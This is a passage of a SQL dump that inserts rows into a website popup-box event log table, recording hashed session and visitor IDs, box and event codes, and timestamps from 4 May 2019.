(89840, 'f73bc760eb6b8dfdf2f4d9f0474641ca', 'b1b974139e0e43c6', 0, 2, 1, '2019-05-04 07:29:11'),
(89841, '3df02805ff59fe1ac4254ae64cab9dff', '2f51e6a0c8436236', 0, 2, 1, '2019-05-04 07:29:26'),
(89842, 'c6a4e4c4b398c87f6e68426e4e87dc9c', 'e2c6c22d01e08258', 0, 2, 1, '2019-05-04 07:29:30'),
(89843, '759de69a22f13091e762d7682cb22ce9', '65fb1a08fe2b5aab', 0, 2, 1, '2019-05-04 07:29:30'),
(89844, '3df02805ff59fe1ac4254ae64cab9dff', '2f51e6a0c8436236', 0, 2, 1, '2019-05-04 07:29:50'),
(89845, '571c4ff37242e9f27640bcd83e44456c', '93e0ffe7e12ab9ba', 0, 2, 1, '2019-05-04 07:29:51'),
(89846, 'f73bc760eb6b8dfdf2f4d9f0474641ca', 'b1b974139e0e43c6', 0, 2, 1, '2019-05-04 07:29:58'),
(89847, '978d79fee868080e40a3e2c32ba1edd0', '5b256f4a57545070', 0, 2, 1, '2019-05-04 07:30:03'),
(89848, '2ddb0cd382fab0115b9d68be3a5dbc3d', 'e9f4076e834ba7fe', 0, 2, 1, '2019-05-04 07:30:04'),
(89849, '55547bb0766077fe3db4e86b77ded6d8', 'f19010d8a5f137d0', 0, 2, 1, '2019-05-04 07:30:10'),
(89850, '759de69a22f13091e762d7682cb22ce9', '65fb1a08fe2b5aab', 0, 2, 1, '2019-05-04 07:30:14'),
(89851, 'bc8c341542c8f0860e7c12c67b27632e', 'c454d725c5518f16', 0, 2, 1, '2019-05-04 07:30:27'),
(89852, '2f9c7437ad1b435335f4c7eee9a9f7a4', 'b4ecb18ba7992a18', 0, 2, 1, '2019-05-04 07:30:31'),
(89853, '571c4ff37242e9f27640bcd83e44456c', '93e0ffe7e12ab9ba', 0, 2, 1, '2019-05-04 07:30:31'),
(89854, 'fab14ce2443421d6ac18912981c08088', '77d629067fed3a03', 0, 2, 1, '2019-05-04 07:30:33'),
(89855, 'b96ce2b696f4f646485bb77ccf9583bd', '687058b58830fd3e', 0, 2, 1, '2019-05-04 07:30:38'),
(89856, 'dc95ad10ac6be751592903b5f7b75cf3', 'fe961668877fa513', 0, 2, 1, '2019-05-04 07:30:39'),
(89857, 'a0e9a864f2edb49de2779521768b705d', 'c20ddc21eab7b8b5', 0, 2, 1, '2019-05-04 07:30:50'),
(89858, '55547bb0766077fe3db4e86b77ded6d8', 'f19010d8a5f137d0', 0, 2, 1, '2019-05-04 07:30:57'),
(89859, 'b96ce2b696f4f646485bb77ccf9583bd', '687058b58830fd3e', 0, 2, 1, '2019-05-04 07:31:00'),
(89860, '570175cc174ce24a98b672307dd576c1', 'b8005b78165ccf11', 0, 2, 1, '2019-05-04 07:31:03'),
(89861, '9f9ed1d1f423235224b3e02ce76fc42a', '0b93d2752fcc7d4e', 0, 2, 1, '2019-05-04 07:31:05'),
(89862, 'f73bc760eb6b8dfdf2f4d9f0474641ca', 'b1b974139e0e43c6', 0, 2, 1, '2019-05-04 07:31:06'),
(89863, 'b96ce2b696f4f646485bb77ccf9583bd', '687058b58830fd3e', 0, 2, 1, '2019-05-04 07:31:11'),
(89864, '759de69a22f13091e762d7682cb22ce9', '65fb1a08fe2b5aab', 0, 2, 1, '2019-05-04 07:31:14'),
(89865, '1a17bf9006e1993c57057906b08481ae', '96838f2a075a32df', 0, 2, 1, '2019-05-04 07:31:26'),
(89866, 'c358057a74397b834c4febdcb9a1801c', 'e3413f2163c4f64a', 0, 2, 1, '2019-05-04 07:31:27'),
(89867, '64a098c7de6b34f63b318259bba8f9b7', '3de88ff4581dab27', 0, 2, 1, '2019-05-04 07:31:31'),
(89868, '2b7f452f76e43247fda5ba8e06bad849', 'da8ceca89cfcb758', 0, 2, 1, '2019-05-04 07:31:32'),
(89869, 'adf5245168caceb5d56bb5782de81438', '7501b42c35accff7', 0, 2, 1, '2019-05-04 07:31:32'),
(89870, '6c4b06ee743fca22bcc5aeea7573878d', '5a072d21018c8a41', 0, 2, 1, '2019-05-04 07:31:39'),
(89871, '978d79fee868080e40a3e2c32ba1edd0', '5b256f4a57545070', 0, 2, 1, '2019-05-04 07:31:39'),
(89872, '3f23a64406e0da77f92e19ce6d0cd21b', '913c1d6747e8d02e', 0, 2, 1, '2019-05-04 07:31:41'),
(89873, '5f14f74236e774125fc07a056696ac45', 'e706e9a0184b2202', 0, 2, 1, '2019-05-04 07:31:43'),
(89874, '5b7e3c78faba6a8650e5b6f26b7dbbee', 'beb388d096cf5162', 0, 2, 1, '2019-05-04 07:31:51'),
(89875, '5f14f74236e774125fc07a056696ac45', 'e706e9a0184b2202', 0, 2, 1, '2019-05-04 07:31:52'),
(89876, '3f23a64406e0da77f92e19ce6d0cd21b', '913c1d6747e8d02e', 0, 2, 1, '2019-05-04 07:32:11'),
(89877, '759de69a22f13091e762d7682cb22ce9', '65fb1a08fe2b5aab', 0, 2, 1, '2019-05-04 07:32:37'),
(89878, '3f23a64406e0da77f92e19ce6d0cd21b', '913c1d6747e8d02e', 0, 2, 1, '2019-05-04 07:32:37'),
(89879, 'e2da921aff1a627b416d9ef0dcd4824f', 'ead365992b655192', 0, 2, 1, '2019-05-04 07:33:10'),
(89880, '652d38bb6f403682e43b17ac2e65be61', '8c117e9ade9703d1', 0, 2, 1, '2019-05-04 07:33:25'),
(89881, '27fc8abedf733a200a9775bf60ef3c28', '0b797fb53ae15810', 0, 2, 1, '2019-05-04 07:33:38'),
(89882, '523b49b3ea508852f66c3ac11de2052d', '49bb4afdabd2eaf2', 0, 2, 1, '2019-05-04 07:33:51'),
(89883, '0975ac5d7c1f04fe231dbb5193a25b25', '135f23c8a85974ba', 0, 2, 1, '2019-05-04 07:34:14'),
(89884, '1f65394eeb2079404b80243144d4847b', 'f1dc25a6be014ee2', 0, 2, 1, '2019-05-04 07:37:12'),
(89885, '2a8ebd30c2117f2b4288591f159c3b10', '3ea4ca1a776d6a6e', 0, 2, 1, '2019-05-04 07:37:15'),
(89886, '0215e682c8674bfd26703bfb2b0f97ef', 'ae1548e7902958ec', 0, 2, 1, '2019-05-04 07:37:23'),
(89887, 'b6f023efc3778d5bb27f1395fac91bec', '7775b26e7cf725ed', 0, 2, 1, '2019-05-04 07:37:35'),
(89888, '91552a5f75d5fdedceeaa42c8453c372', 'aed97f243a2091c1', 0, 2, 1, '2019-05-04 07:37:37'),
(89889, '68d0fb651140c5ad9bf7f4787a847f77', '3bece7bd84369fae', 0, 2, 1, '2019-05-04 07:38:08'),
(89890, 'e2da921aff1a627b416d9ef0dcd4824f', 'ead365992b655192', 0, 2, 1, '2019-05-04 07:40:04'),
(89891, 'd5419d6b0f225fd1693c604245d75972', 'a4606350cb27c277', 0, 2, 1, '2019-05-04 07:40:28'),
(89892, '3f6573031890ec0f7da2a0604573ef1a', '2034f09284a4c7ca', 0, 2, 1, '2019-05-04 07:41:02'),
(89893, 'f73bc760eb6b8dfdf2f4d9f0474641ca', 'b1b974139e0e43c6', 0, 2, 1, '2019-05-04 07:41:26'),
(89894, 'a7815f326d48a8fefc594034861f19b9', 'ed66fc7b9e56126c', 0, 2, 1, '2019-05-04 07:41:32'),
(89895, 'a7815f326d48a8fefc594034861f19b9', 'ed66fc7b9e56126c', 0, 2, 1, '2019-05-04 07:41:43'),
(89896, '0215e682c8674bfd26703bfb2b0f97ef', 'ae1548e7902958ec', 0, 2, 1, '2019-05-04 07:44:03'),
(89897, 'a2c03c6d619026d55a7f0a126bfe1f33', '332723ec6654d9f5', 0, 2, 1, '2019-05-04 07:44:40'),
(89898, '759de69a22f13091e762d7682cb22ce9', '65fb1a08fe2b5aab', 0, 2, 1, '2019-05-04 07:45:48'),
(89899, 'f73bc760eb6b8dfdf2f4d9f0474641ca', 'b1b974139e0e43c6', 0, 2, 1, '2019-05-04 07:45:49'),
(89900, '5b7e3c78faba6a8650e5b6f26b7dbbee', 'beb388d096cf5162', 0, 2, 1, '2019-05-04 07:46:34'),
(89901, '9fdad8b4b82515c72cb750c63ca773bc', '8605fcfecc3564f4', 0, 2, 1, '2019-05-04 07:47:12'),
(89902, 'dc95ad10ac6be751592903b5f7b75cf3', 'fe961668877fa513', 0, 2, 1, '2019-05-04 07:47:14'),
(89903, 'd7e452fdca6aa67068021054006445d0', '3371af0459389eff', 0, 2, 1, '2019-05-04 07:47:16'),
(89904, '1a9c88168d459d74adb0ce6ed90ed45c', '92fceb3dfbbbaf7f', 0, 2, 1, '2019-05-04 07:47:20'),
(89905, '58f57f66e5595237bc841eb8708622f6', '86f971d8c824d84a', 0, 2, 1, '2019-05-04 07:47:42'),
(89906, 'b6b092d29e8a6066247f9f4200c1cdcb', 'c020abbb40884763', 0, 2, 1, '2019-05-04 07:48:01'),
(89907, '27d9835c5cbe562cf3fe56f01051be89', '324d0c5c1f480926', 0, 2, 1, '2019-05-04 07:49:48'),
(89908, '4ce8ff17f4959157de1553ed5f28e158', '92127ae1b4d5b310', 0, 2, 1, '2019-05-04 07:50:03'),
(89909, 'c358057a74397b834c4febdcb9a1801c', 'e3413f2163c4f64a', 0, 2, 1, '2019-05-04 07:52:00'),
(89910, '27d9835c5cbe562cf3fe56f01051be89', '324d0c5c1f480926', 0, 2, 1, '2019-05-04 07:55:48'),
(89911, '9e20761f4c299e3dcc05c3ed6dfd3fd8', '9699c45903fe17ef', 0, 2, 1, '2019-05-04 07:56:18'),
(89912, '27d9835c5cbe562cf3fe56f01051be89', '324d0c5c1f480926', 0, 2, 1, '2019-05-04 07:56:25'),
(89913, '711c0c4bac8f701661f5e49a27ba6b06', 'cfbe639136cf20bf', 0, 2, 1, '2019-05-04 07:59:00'),
(89914, '07c7b43ec1f4afffa4ae20e131962434', '81aa20345d9cca6d', 0, 2, 1, '2019-05-04 08:02:54'),
(89915, 'b6b092d29e8a6066247f9f4200c1cdcb', 'c020abbb40884763', 0, 2, 1, '2019-05-04 08:08:55'),
(89916, '759de69a22f13091e762d7682cb22ce9', '65fb1a08fe2b5aab', 0, 2, 1, '2019-05-04 08:10:41'),
(89917, 'b63940505b14d4cd6bb44575e436d3e9', '7d3e015101cab243', 0, 2, 1, '2019-05-04 08:12:20'),
(89918, 'a0e9a864f2edb49de2779521768b705d', 'c20ddc21eab7b8b5', 0, 2, 1, '2019-05-04 08:22:04'),
(89919, '58f57f66e5595237bc841eb8708622f6', '86f971d8c824d84a', 0, 2, 1, '2019-05-04 08:22:29'),
(89920, 'a2f0ec21d9b8486730644500bae1f3e4', 'ecd538680cf5133a', 0, 2, 1, '2019-05-04 08:22:57'),
(89921, '4ce8ff17f4959157de1553ed5f28e158', '92127ae1b4d5b310', 0, 2, 1, '2019-05-04 08:23:20'),
(89922, 'a0a4d980a28144514930740537bfc748', '50d02461c9e1908b', 0, 2, 1, '2019-05-04 08:23:35'),
(89923, 'd1e2182e8c927e57036a4c1c79a09971', 'e3ee6145276a2426', 0, 2, 1, '2019-05-04 08:24:43'),
(89924, 'd1e2182e8c927e57036a4c1c79a09971', 'e3ee6145276a2426', 0, 2, 1, '2019-05-04 08:26:02'),
(89925, 'a0e9a864f2edb49de2779521768b705d', 'c20ddc21eab7b8b5', 0, 2, 1, '2019-05-04 08:30:44'),
(89926, '4ce8ff17f4959157de1553ed5f28e158', '92127ae1b4d5b310', 0, 2, 1, '2019-05-04 08:30:46'),
(89927, '58f57f66e5595237bc841eb8708622f6', '86f971d8c824d84a', 0, 2, 1, '2019-05-04 08:31:22'),
(89928, 'e2da921aff1a627b416d9ef0dcd4824f', 'ead365992b655192', 0, 2, 1, '2019-05-04 08:31:29'),
(89929, '6b1e3a5d9f2fd72c98aeb369df36c037', 'f445d5f6a9af4e46', 0, 2, 1, '2019-05-04 08:33:20'),
(89930, '31dc86419fb9194f961ed6ffaac7510b', 'dcadb578720d99b9', 0, 2, 1, '2019-05-04 08:35:17'),
(89931, 'c1882b4aa58aff981a546a08df61e434', '1d9c54d0b37930ed', 0, 2, 1, '2019-05-04 08:42:03'),
(89932, 'c1882b4aa58aff981a546a08df61e434', '1d9c54d0b37930ed', 0, 2, 1, '2019-05-04 08:42:11'),
(89933, 'adf5245168caceb5d56bb5782de81438', '7501b42c35accff7', 0, 2, 1, '2019-05-04 08:43:08'),
(89934, 'e9c1920174a98adf56c105734089b748', 'c4c9002176fd8f74', 0, 2, 1, '2019-05-04 08:43:56'),
(89935, '40423ef247efcc28b24782ded341b31a', 'ab0c0d8663389a6f', 0, 2, 1, '2019-05-04 08:45:44'),
(89936, 'a0a4d980a28144514930740537bfc748', '50d02461c9e1908b', 0, 2, 1, '2019-05-04 08:46:09'),
(89937, '3f23a64406e0da77f92e19ce6d0cd21b', '913c1d6747e8d02e', 0, 2, 1, '2019-05-04 08:48:25'),
(89938, '3f23a64406e0da77f92e19ce6d0cd21b', '913c1d6747e8d02e', 0, 2, 1, '2019-05-04 08:49:04'),
(89939, '3f23a64406e0da77f92e19ce6d0cd21b', '913c1d6747e8d02e', 0, 2, 1, '2019-05-04 08:49:15'),
(89940, '3f23a64406e0da77f92e19ce6d0cd21b', '913c1d6747e8d02e', 0, 2, 1, '2019-05-04 08:49:35'),
(89941, '5a10c191aadd022a6efd6f389f424120', '1f1853d5477441ce', 0, 2, 1, '2019-05-04 08:56:17'),
(89942, '759de69a22f13091e762d7682cb22ce9', '65fb1a08fe2b5aab', 0, 2, 1, '2019-05-04 08:56:42'),
(89943, '4ce8ff17f4959157de1553ed5f28e158', '92127ae1b4d5b310', 0, 2, 1, '2019-05-04 08:56:46'),
(89944, 'f73bc760eb6b8dfdf2f4d9f0474641ca', 'b1b974139e0e43c6', 0, 2, 1, '2019-05-04 08:56:53'),
(89945, '27ab733c30f42d31421f3a699e87037c', '291ee571e128fbe0', 0, 2, 1, '2019-05-04 08:56:57'),
(89946, '759de69a22f13091e762d7682cb22ce9', '65fb1a08fe2b5aab', 0, 2, 1, '2019-05-04 08:56:59'),
(89947, 'a0e9a864f2edb49de2779521768b705d', 'c20ddc21eab7b8b5', 0, 2, 1, '2019-05-04 08:57:10'),
(89948, '58f57f66e5595237bc841eb8708622f6', '86f971d8c824d84a', 0, 2, 1, '2019-05-04 08:57:11'),
(89949, '68d0fb651140c5ad9bf7f4787a847f77', '3bece7bd84369fae', 0, 2, 1, '2019-05-04 08:57:12'),
(89950, '759de69a22f13091e762d7682cb22ce9', '65fb1a08fe2b5aab', 0, 2, 1, '2019-05-04 08:57:15'),
(89951, 'b96ce2b696f4f646485bb77ccf9583bd', '687058b58830fd3e', 0, 2, 1, '2019-05-04 08:57:19'),
(89952, 'a2c03c6d619026d55a7f0a126bfe1f33', '332723ec6654d9f5', 0, 2, 1, '2019-05-04 08:57:20'),
(89953, '27d9835c5cbe562cf3fe56f01051be89', '324d0c5c1f480926', 0, 2, 1, '2019-05-04 08:57:22'),
(89954, '07c7b43ec1f4afffa4ae20e131962434', '81aa20345d9cca6d', 0, 2, 1, '2019-05-04 08:57:23'),
(89955, '4ce8ff17f4959157de1553ed5f28e158', '92127ae1b4d5b310', 0, 2, 1, '2019-05-04 08:57:27'),
(89956, '27ab733c30f42d31421f3a699e87037c', '291ee571e128fbe0', 0, 2, 1, '2019-05-04 08:57:27'),
(89957, '68d0fb651140c5ad9bf7f4787a847f77', '3bece7bd84369fae', 0, 2, 1, '2019-05-04 08:57:28'),
(89958, '31dc86419fb9194f961ed6ffaac7510b', 'dcadb578720d99b9', 0, 2, 1, '2019-05-04 08:57:34'),
(89959, 'f73bc760eb6b8dfdf2f4d9f0474641ca', 'b1b974139e0e43c6', 0, 2, 1, '2019-05-04 08:57:35'),
(89960, 'b96ce2b696f4f646485bb77ccf9583bd', '687058b58830fd3e', 0, 2, 1, '2019-05-04 08:57:38'),
(89961, '6c3d45d5bb688a4fec12e5d979722b67', 'a1e2ea8331e86445', 0, 2, 1, '2019-05-04 08:57:38'),
(89962, '759de69a22f13091e762d7682cb22ce9', '65fb1a08fe2b5aab', 0, 2, 1, '2019-05-04 08:57:40'),
(89963, '570175cc174ce24a98b672307dd576c1', 'b8005b78165ccf11', 0, 2, 1, '2019-05-04 08:57:47'),
(89964, 'c358057a74397b834c4febdcb9a1801c', 'e3413f2163c4f64a', 0, 2, 1, '2019-05-04 08:57:48'),
(89965, 'b96ce2b696f4f646485bb77ccf9583bd', '687058b58830fd3e', 0, 2, 1, '2019-05-04 08:57:50'),
(89966, '759de69a22f13091e762d7682cb22ce9', '65fb1a08fe2b5aab', 0, 2, 1, '2019-05-04 08:57:51'),
(89967, '07c7b43ec1f4afffa4ae20e131962434', '81aa20345d9cca6d', 0, 2, 1, '2019-05-04 08:57:56'),
(89968, '31dc86419fb9194f961ed6ffaac7510b', 'dcadb578720d99b9', 0, 2, 1, '2019-05-04 08:57:58'),
(89969, 'b96ce2b696f4f646485bb77ccf9583bd', '687058b58830fd3e', 0, 2, 1, '2019-05-04 08:58:03'),
(89970, '759de69a22f13091e762d7682cb22ce9', '65fb1a08fe2b5aab', 0, 2, 1, '2019-05-04 08:58:04'),
(89971, '570175cc174ce24a98b672307dd576c1', 'b8005b78165ccf11', 0, 2, 1, '2019-05-04 08:58:07'),
(89972, '416b5125bd8d0bdba83558a6f6d94fce', 'ff943bd4be7d6ba5', 0, 2, 1, '2019-05-04 08:58:08'),
(89973, 'a0e9a864f2edb49de2779521768b705d', 'c20ddc21eab7b8b5', 0, 2, 1, '2019-05-04 08:58:25'),
(89974, '27d9835c5cbe562cf3fe56f01051be89', '324d0c5c1f480926', 0, 2, 1, '2019-05-04 08:58:28'),
(89975, '639fec8c6c7a15548673d4ee38fdea02', '0a89162498b4a9f3', 0, 2, 1, '2019-05-04 08:58:34'),
(89976, '2f9c7437ad1b435335f4c7eee9a9f7a4', 'b4ecb18ba7992a18', 0, 2, 1, '2019-05-04 08:58:36'),
(89977, '570175cc174ce24a98b672307dd576c1', 'b8005b78165ccf11', 0, 2, 1, '2019-05-04 08:58:36'),
(89978, '8bfc63b564f2478832726bd3ece1e07d', '87e2978d1d3d1a07', 0, 2, 1, '2019-05-04 08:58:42'),
(89979, 'b96ce2b696f4f646485bb77ccf9583bd', '687058b58830fd3e', 0, 2, 1, '2019-05-04 08:58:42'),
(89980, '58f57f66e5595237bc841eb8708622f6', '86f971d8c824d84a', 0, 2, 1, '2019-05-04 08:58:43'),
(89981, '31dc86419fb9194f961ed6ffaac7510b', 'dcadb578720d99b9', 0, 2, 1, '2019-05-04 08:58:43'),
(89982, 'bc8c341542c8f0860e7c12c67b27632e', 'c454d725c5518f16', 0, 2, 1, '2019-05-04 08:58:44'),
(89983, '759de69a22f13091e762d7682cb22ce9', '65fb1a08fe2b5aab', 0, 2, 1, '2019-05-04 08:58:44'),
(89984, 'a2c03c6d619026d55a7f0a126bfe1f33', '332723ec6654d9f5', 0, 2, 1, '2019-05-04 08:58:51'),
(89985, '416b5125bd8d0bdba83558a6f6d94fce', 'ff943bd4be7d6ba5', 0, 2, 1, '2019-05-04 08:58:52'),
(89986, '759de69a22f13091e762d7682cb22ce9', '65fb1a08fe2b5aab', 0, 2, 1, '2019-05-04 08:59:00'),
(89987, 'b96ce2b696f4f646485bb77ccf9583bd', '687058b58830fd3e', 0, 2, 1, '2019-05-04 08:59:01'),
(89988, 'a2c03c6d619026d55a7f0a126bfe1f33', '332723ec6654d9f5', 0, 2, 1, '2019-05-04 08:59:03'),
(89989, 'f73bc760eb6b8dfdf2f4d9f0474641ca', 'b1b974139e0e43c6', 0, 2, 1, '2019-05-04 08:59:06'),
(89990, '27ab733c30f42d31421f3a699e87037c', '291ee571e128fbe0', 0, 2, 1, '2019-05-04 08:59:08'),
(89991, '6c4b06ee743fca22bcc5aeea7573878d', '5a072d21018c8a41', 0, 2, 1, '2019-05-04 08:59:15'),
(89992, '31dc86419fb9194f961ed6ffaac7510b', 'dcadb578720d99b9', 0, 2, 1, '2019-05-04 08:59:15'),
(89993, 'b96ce2b696f4f646485bb77ccf9583bd', '687058b58830fd3e', 0, 2, 1, '2019-05-04 08:59:17'),
(89994, 'b44849c084eed4c8f352b46d857975aa', '1fbc110353cdd6e5', 0, 2, 1, '2019-05-04 08:59:18'),
(89995, '759de69a22f13091e762d7682cb22ce9', '65fb1a08fe2b5aab', 0, 2, 1, '2019-05-04 08:59:19'),
(89996, '58f57f66e5595237bc841eb8708622f6', '86f971d8c824d84a', 0, 2, 1, '2019-05-04 08:59:24'),
(89997, 'b96ce2b696f4f646485bb77ccf9583bd', '687058b58830fd3e', 0, 2, 1, '2019-05-04 08:59:32'),
(89998, '68d0fb651140c5ad9bf7f4787a847f77', '3bece7bd84369fae', 0, 2, 1, '2019-05-04 08:59:33'),
(89999, 'f73bc760eb6b8dfdf2f4d9f0474641ca', 'b1b974139e0e43c6', 0, 2, 1, '2019-05-04 08:59:37'),
(90000, '570175cc174ce24a98b672307dd576c1', 'b8005b78165ccf11', 0, 2, 1, '2019-05-04 08:59:42'),
(90001, '27d9835c5cbe562cf3fe56f01051be89', '324d0c5c1f480926', 0, 2, 1, '2019-05-04 08:59:46'),
(90002, '759de69a22f13091e762d7682cb22ce9', '65fb1a08fe2b5aab', 0, 2, 1, '2019-05-04 08:59:50');
INSERT INTO `y57u5_rstbox_logs` (`id`, `sessionid`, `visitorid`, `user`, `box`, `event`, `date`) VALUES
(90003, '58f57f66e5595237bc841eb8708622f6', '86f971d8c824d84a', 0, 2, 1, '2019-05-04 08:59:52'),
(90004, '759de69a22f13091e762d7682cb22ce9', '65fb1a08fe2b5aab', 0, 2, 1, '2019-05-04 09:00:07'),
(90005, '6c4b06ee743fca22bcc5aeea7573878d', '5a072d21018c8a41', 0, 2, 1, '2019-05-04 09:00:11'),
(90006, '5f14f74236e774125fc07a056696ac45', 'e706e9a0184b2202', 0, 2, 1, '2019-05-04 09:00:15'),
(90007, 'b96ce2b696f4f646485bb77ccf9583bd', '687058b58830fd3e', 0, 2, 1, '2019-05-04 09:00:24'),
(90008, '4ce8ff17f4959157de1553ed5f28e158', '92127ae1b4d5b310', 0, 2, 1, '2019-05-04 09:00:27'),
(90009, 'c358057a74397b834c4febdcb9a1801c', 'e3413f2163c4f64a', 0, 2, 1, '2019-05-04 09:00:27'),
(90010, 'a2c03c6d619026d55a7f0a126bfe1f33', '332723ec6654d9f5', 0, 2, 1, '2019-05-04 09:00:33'),
(90011, 'f73bc760eb6b8dfdf2f4d9f0474641ca', 'b1b974139e0e43c6', 0, 2, 1, '2019-05-04 09:00:36'),
(90012, 'adf5245168caceb5d56bb5782de81438', '7501b42c35accff7', 0, 2, 1, '2019-05-04 09:00:38'),
(90013, '2f9c7437ad1b435335f4c7eee9a9f7a4', 'b4ecb18ba7992a18', 0, 2, 1, '2019-05-04 09:00:39'),
(90014, '31dc86419fb9194f961ed6ffaac7510b', 'dcadb578720d99b9', 0, 2, 1, '2019-05-04 09:00:42'),
(90015, '58f57f66e5595237bc841eb8708622f6', '86f971d8c824d84a', 0, 2, 1, '2019-05-04 09:00:45'),
(90016, '2f9c7437ad1b435335f4c7eee9a9f7a4', 'b4ecb18ba7992a18', 0, 2, 1, '2019-05-04 09:00:57'),
(90017, 'bc8c341542c8f0860e7c12c67b27632e', 'c454d725c5518f16', 0, 2, 1, '2019-05-04 09:00:58'),
(90018, '27d9835c5cbe562cf3fe56f01051be89', '324d0c5c1f480926', 0, 2, 1, '2019-05-04 09:01:05'),
(90019, '416b5125bd8d0bdba83558a6f6d94fce', 'ff943bd4be7d6ba5', 0, 2, 1, '2019-05-04 09:01:05'),
(90020, '8bfc63b564f2478832726bd3ece1e07d', '87e2978d1d3d1a07', 0, 2, 1, '2019-05-04 09:01:22'),
(90021, 'f73bc760eb6b8dfdf2f4d9f0474641ca', 'b1b974139e0e43c6', 0, 2, 1, '2019-05-04 09:01:43'),
(90022, '3d96be55c3f5ce8b42f05537cbca1d21', 'd592f0cdfed370c0', 0, 2, 1, '2019-05-04 09:01:52'),
(90023, 'a824b5a06f2244d3aa641bb080337502', '503a514a8daa32a7', 0, 2, 1, '2019-05-04 09:01:56'),
(90024, 'bc8c341542c8f0860e7c12c67b27632e', 'c454d725c5518f16', 0, 2, 1, '2019-05-04 09:02:10'),
(90025, '6c4b06ee743fca22bcc5aeea7573878d', '5a072d21018c8a41', 0, 2, 1, '2019-05-04 09:02:16'),
(90026, '27ab733c30f42d31421f3a699e87037c', '291ee571e128fbe0', 0, 2, 1, '2019-05-04 09:02:17'),
(90027, 'a824b5a06f2244d3aa641bb080337502', '503a514a8daa32a7', 0, 2, 1, '2019-05-04 09:02:22'),
(90028, 'b96ce2b696f4f646485bb77ccf9583bd', '687058b58830fd3e', 0, 2, 1, '2019-05-04 09:02:32'),
(90029, '0975ac5d7c1f04fe231dbb5193a25b25', '135f23c8a85974ba', 0, 2, 1, '2019-05-04 09:02:33'),
(90030, '58f57f66e5595237bc841eb8708622f6', '86f971d8c824d84a', 0, 2, 1, '2019-05-04 09:02:37'),
(90031, '759de69a22f13091e762d7682cb22ce9', '65fb1a08fe2b5aab', 0, 2, 1, '2019-05-04 09:02:39'),
(90032, '68d0fb651140c5ad9bf7f4787a847f77', '3bece7bd84369fae', 0, 2, 1, '2019-05-04 09:02:39'),
(90033, 'bc8c341542c8f0860e7c12c67b27632e', 'c454d725c5518f16', 0, 2, 1, '2019-05-04 09:02:40'),
(90034, 'b96ce2b696f4f646485bb77ccf9583bd', '687058b58830fd3e', 0, 2, 1, '2019-05-04 09:02:44'),
(90035, '3d96be55c3f5ce8b42f05537cbca1d21', 'd592f0cdfed370c0', 0, 2, 1, '2019-05-04 09:02:46'),
(90036, 'a0e9a864f2edb49de2779521768b705d', 'c20ddc21eab7b8b5', 0, 2, 1, '2019-05-04 09:02:48'),
(90037, 'f73bc760eb6b8dfdf2f4d9f0474641ca', 'b1b974139e0e43c6', 0, 2, 1, '2019-05-04 09:02:57'),
(90038, 'ca07bf705aa5118be6eec39e92e8a9b4', '33947d91a86f4b08', 0, 2, 1, '2019-05-04 09:02:59'),
(90039, 'b44849c084eed4c8f352b46d857975aa', '1fbc110353cdd6e5', 0, 2, 1, '2019-05-04 09:03:27'),
(90040, 'b96ce2b696f4f646485bb77ccf9583bd', '687058b58830fd3e', 0, 2, 1, '2019-05-04 09:03:36'),
(90041, 'b44849c084eed4c8f352b46d857975aa', '1fbc110353cdd6e5', 0, 2, 1, '2019-05-04 09:03:38'),
(90042, '55547bb0766077fe3db4e86b77ded6d8', 'f19010d8a5f137d0', 0, 2, 1, '2019-05-04 09:03:57'),
(90043, 'f73bc760eb6b8dfdf2f4d9f0474641ca', 'b1b974139e0e43c6', 0, 2, 1, '2019-05-04 09:04:14'),
(90044, 'b96ce2b696f4f646485bb77ccf9583bd', '687058b58830fd3e', 0, 2, 1, '2019-05-04 09:04:16'),
(90045, 'c76387fa4f0c04ff3bf6e95b02a36ba4', '93e0ffe7e12ab9ba', 0, 2, 1, '2019-05-04 09:04:54'),
(90046, 'f73bc760eb6b8dfdf2f4d9f0474641ca', 'b1b974139e0e43c6', 0, 2, 1, '2019-05-04 09:04:59'),
(90047, 'c1882b4aa58aff981a546a08df61e434', '1d9c54d0b37930ed', 0, 2, 1, '2019-05-04 09:05:23'),
(90048, '2f9c7437ad1b435335f4c7eee9a9f7a4', 'b4ecb18ba7992a18', 0, 2, 1, '2019-05-04 09:06:20'),
(90049, 'c358057a74397b834c4febdcb9a1801c', 'e3413f2163c4f64a', 0, 2, 1, '2019-05-04 09:07:29'),
(90050, '8b6414bc9241528674f4cefb3bb578e1', '846dcc220c9d1cd7', 0, 2, 1, '2019-05-04 09:08:38'),
(90051, '4ac2bbef14a83dd6ea7046e3a70b245b', '324d0c5c1f480926', 0, 2, 1, '2019-05-04 09:09:47'),
(90052, '8e1dee8e9184e795af3c1a148344e9ef', 'c965ee39bfe4df73', 0, 2, 1, '2019-05-04 09:11:54'),
(90053, '8e1dee8e9184e795af3c1a148344e9ef', 'c965ee39bfe4df73', 0, 2, 1, '2019-05-04 09:12:22'),
(90054, '07c7b43ec1f4afffa4ae20e131962434', '81aa20345d9cca6d', 0, 2, 1, '2019-05-04 09:14:16'),
(90055, '2f9c7437ad1b435335f4c7eee9a9f7a4', 'b4ecb18ba7992a18', 0, 2, 1, '2019-05-04 09:14:28'),
(90056, '2f9c7437ad1b435335f4c7eee9a9f7a4', 'b4ecb18ba7992a18', 0, 2, 1, '2019-05-04 09:15:09'),
(90057, 'e9c1920174a98adf56c105734089b748', 'c4c9002176fd8f74', 0, 2, 1, '2019-05-04 09:17:08'),
(90058, 'c358057a74397b834c4febdcb9a1801c', 'e3413f2163c4f64a', 0, 2, 1, '2019-05-04 09:17:28'),
(90059, '4e4719c49bd19795f3f7c9c180df2c9d', '9bbbf0cc96b13eb1', 0, 2, 1, '2019-05-04 09:18:19'),
(90060, '07c7b43ec1f4afffa4ae20e131962434', '81aa20345d9cca6d', 0, 2, 1, '2019-05-04 09:18:32'),
(90061, 'f73bc760eb6b8dfdf2f4d9f0474641ca', 'b1b974139e0e43c6', 0, 2, 1, '2019-05-04 09:19:02'),
(90062, 'a0e9a864f2edb49de2779521768b705d', 'c20ddc21eab7b8b5', 0, 2, 1, '2019-05-04 09:19:12'),
(90063, '68d0fb651140c5ad9bf7f4787a847f77', '3bece7bd84369fae', 0, 2, 1, '2019-05-04 09:19:15'),
(90064, 'f73bc760eb6b8dfdf2f4d9f0474641ca', 'b1b974139e0e43c6', 0, 2, 1, '2019-05-04 09:19:17'),
(90065, '4e4719c49bd19795f3f7c9c180df2c9d', '9bbbf0cc96b13eb1', 0, 2, 1, '2019-05-04 09:19:30'),
(90066, 'c358057a74397b834c4febdcb9a1801c', 'e3413f2163c4f64a', 0, 2, 1, '2019-05-04 09:19:31'),
